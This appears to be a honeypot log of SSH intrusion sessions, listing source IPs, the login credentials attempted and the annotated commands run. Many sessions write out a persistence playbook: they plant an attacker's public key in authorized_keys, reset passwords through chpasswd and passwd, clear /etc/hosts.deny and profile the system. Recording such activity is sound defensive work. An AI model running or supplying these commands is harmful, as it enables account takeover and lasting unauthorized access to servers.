Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_2 (20.228.193.165) β€” Boydton, United States Β· 6 sessions Β· 117 cmds
2026-05-08 11:36 EDT Β· as kibana/kibana, root/admin1, root/linux123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo "root:9IDRZTLNRZnm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo -e "kibana\nJtBJ4Xl666yq\nJtBJ4Xl666yq"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "kibana\nJtBJ4Xl666yq\nJtBJ4Xl666yq\n"|passwd
$ echo "root:zKDXzTdZIilJ"|chpasswd|bash
$ echo "root:j2VgNbon0dNU"|chpasswd|bash
$ echo -e "Ubuntu@123\n5odrTvj4EgU7\n5odrTvj4EgU7"|passwd|bash
$ echo "Ubuntu@123\n5odrTvj4EgU7\n5odrTvj4EgU7\n"|passwd
$ echo -e "admin222\nOa6qlB0LSiMx\nOa6qlB0LSiMx"|passwd|bash
$ echo "admin222\nOa6qlB0LSiMx\nOa6qlB0LSiMx\n"|passwd
🎭 fjord_root_2 (31.208.22.146) β€” Gothenburg, Sweden Β· 3 sessions Β· 59 cmds
2026-05-05 22:45 EDT Β· as dev/Qwerty@123, root/admin1, ubuntu/ubuntu@4321
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:0e0bBYi32fYh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Qwerty@123\nS7dWUmfwjCgF\nS7dWUmfwjCgF"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Qwerty@123\nS7dWUmfwjCgF\nS7dWUmfwjCgF\n"|passwd
$ echo -e "ubuntu@4321\nnoxpcWzVKWC4\nnoxpcWzVKWC4"|passwd|bash
$ echo "ubuntu@4321\nnoxpcWzVKWC4\nnoxpcWzVKWC4\n"|passwd
🎭 phantom_root_87 (101.47.159.125) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-20 04:56 EDT Β· as claude/claude
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "claude\nhLdROeUfkpOT\nhLdROeUfkpOT"|passwd|bash
$ Enter new UNIX password:
$ echo "claude\nhLdROeUfkpOT\nhLdROeUfkpOT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_74 (181.39.158.30) β€” Guayaquil, Ecuador Β· 1 session Β· 20 cmds
2026-05-20 04:55 EDT Β· as claude/Claude2026!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Claude2026!\nggOz35oAgvc9\nggOz35oAgvc9"|passwd|bash
$ Enter new UNIX password:
$ echo "Claude2026!\nggOz35oAgvc9\nggOz35oAgvc9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_85 (125.212.218.73) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-20 04:54 EDT Β· as root/admin@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_88 (150.5.128.67) β€” Hong Kong, Hong Kong Β· 1 session Β· 1 cmd
2026-05-20 04:41 EDT Β· as root/Jimster#1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_96 (206.237.8.22) β€” Kwun Tong, Hong Kong Β· 1 session Β· 1 cmd
2026-05-20 04:35 EDT Β· as root/Welcome@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bike_root_13 (185.213.175.248) β€” Dronten, The Netherlands Β· 1 session Β· 1 cmd
2026-05-20 04:30 EDT Β· as admin/Jimster@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lantern_root_31 (101.237.36.193) β€” Yangpu, China Β· 1 session Β· 1 cmd
2026-05-20 03:40 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 bistro_root_9 (62.171.177.193) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-20 03:34 EDT Β· as jimster/admin@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 spice_root_13 (14.195.24.147) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-05-20 03:26 EDT Β· as admin/password123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cosmo_root_7 (193.233.48.169) β€” Moscow, Russia Β· 2 sessions Β· 38 cmds
2026-05-20 02:58 EDT Β· as root/Test1234., root/server2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:xU8qZxzMPMt8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:MRfTez0dg7P7"|chpasswd|bash
🎭 rogue_root_94 (43.163.102.146) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-20 02:59 EDT Β· as root/server2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:xU8qZxzMPMt8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_97 (46.250.237.225) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-20 02:45 EDT Β· as root/P@ssword2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_89 (46.62.158.117) β€” Helsinki, Finland Β· 1 session Β· 1 cmd
2026-05-20 02:39 EDT Β· as admin/p@ssword2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ramen_root_7 (133.88.123.11) β€” Nagoya, Japan Β· 1 session Β· 1 cmd
2026-05-20 02:20 EDT Β· as root/Jimster!123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_95 (103.75.183.232) β€” Thα»§ Đức, Vietnam Β· 1 session Β· 1 cmd
2026-05-20 02:13 EDT Β· as admin/1#Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 pretzel_root_18 (217.154.168.253) β€” Berlin, Germany Β· 1 session Β· 1 cmd
2026-05-20 02:05 EDT Β· as jimster/P@ssw0rd123@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wok_root_24 (150.158.13.245) β€” Shanghai, China Β· 1 session Β· 19 cmds
2026-05-20 01:55 EDT Β· as root/Super123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:6njddUOCW9WL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_98 (43.129.211.157) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-20 01:42 EDT Β· as root/pass1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:khU4UGKfvkcK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_34 (167.172.133.85) β€” North Bergen, United States Β· 1 session Β· 19 cmds
2026-05-20 01:32 EDT Β· as root/qwerty!@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:4FxveCEZ03UX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_32 (124.71.99.252) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-20 01:09 EDT Β· as root/jimster!2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 fog_root_3 (87.106.143.92) β€” Worcester, United Kingdom Β· 1 session Β· 1 cmd
2026-05-20 01:06 EDT Β· as jimster/Jimster$2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_9 (151.253.89.13) β€” Ras al-Khaimah, United Arab Emirates Β· 1 session Β· 1 cmd
2026-05-20 00:33 EDT Β· as jimster/P@ssword@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 hockey_root_5 (149.5.246.106) β€” Montreal, Canada Β· 1 session Β· 1 cmd
2026-05-20 00:24 EDT Β· as root/Jimster#2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_42 (129.121.98.27) β€” Burlington, United States Β· 1 session Β· 1 cmd
2026-05-20 00:17 EDT Β· as root/Jimster!2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 monsoon_root_15 (206.189.134.35) β€” Bengaluru, India Β· 1 session Β· 19 cmds
2026-05-20 00:06 EDT Β· as root/Zz123456@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:p5qeBMw99v27"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_75 (43.134.142.121) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-19 23:53 EDT Β· as root/teste1234@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:7OSOIWAimvGZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_75 (66.116.243.206) β€” Abu Dhabi, United Arab Emirates Β· 1 session Β· 1 cmd
2026-05-19 23:50 EDT Β· as admin/Admin2026#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bistro_root_10 (164.68.112.63) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 23:44 EDT Β· as jimster/Admin2025#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_42 (38.60.109.182) β€” Los Angeles, United States Β· 1 session Β· 1 cmd
2026-05-19 23:37 EDT Β· as admin/Admin2025#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chateau_root_14 (62.169.23.170) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 23:35 EDT Β· as root/Passw0rd@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 star_root_35 (70.32.114.229) β€” Tempe, United States Β· 1 session Β· 1 cmd
2026-05-19 23:30 EDT Β· as root/Password123#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
